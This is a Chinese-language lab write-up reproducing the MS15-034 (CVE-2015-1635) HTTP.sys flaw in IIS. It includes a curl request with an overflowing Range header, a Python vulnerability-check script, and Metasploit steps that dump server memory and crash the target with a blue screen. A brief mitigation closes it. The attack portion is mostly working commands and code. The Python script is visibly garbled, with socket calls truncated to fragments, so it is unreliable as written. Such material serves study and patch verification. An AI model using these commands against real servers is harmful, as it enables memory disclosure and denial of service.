【复现】CVE-2015-1635-HTTP.SYS远程执⾏代码漏洞(ms15-
034)
1.1.1 漏洞描述
在2015年4⽉安全补丁⽇,微软发布的众多安全更新中,修复了HTTP.sys中⼀处允许远程执⾏代码漏洞,编号为:CVE-2015-
1635(MS15-034 )。利⽤HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显⽰,该漏洞对服务器系统造成了不⼩的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
1.1.2 漏洞测试
环境搭建:
靶机: win7(192.168.80.130)
攻击机: kali(192.168.80.129)
(1)使⽤curl⼯具进⾏测试,测试命令:
curl 192.168.80.130 -H "Host: 192.168.80.130" -H "Range: bytes=0-18446744073709551615"
测试结果截图:
(2)使⽤POC测试,代码为:
import socket
import random
ipAddr = "192.168.80.130"
hexAllFfff = "18446744073709551615"
req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
print"[*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
t((ipAddr, 80))
client_socket.send(req1)
boringResp = v(1024)
if"Microsoft"not in boringResp:
print"[*] Not IIS"
exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
t((ipAddr, 80))
client_socket.send(req)
goodResp = v(1024)
if"Requested Range Not Satisfiable"in goodResp:
print"[!!] Looks VULN"
elif" The request has an invalid header name"in goodResp:
print"[*] Looks Patched"
else:
print"[*] Unexpected response, cannot discern patch status"
测试结果截图:
1.1.3 漏洞利⽤
(1)利⽤ms15-034漏洞读取服务器内存数据
借助metasploit平台,截图如下:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhosts 192.168.80.130
run
(2)利⽤ms15-034漏洞进⾏ddos攻击
同样借助metasploit平台,截图如下:
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.80.130
set threads 10
run
攻击开始后,win7瞬间蓝屏然后⾃动重启,截图如下:
1.1.4 漏洞修复
禁⽤IIS内核缓存(可能降低IIS性能)
cve漏洞库
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论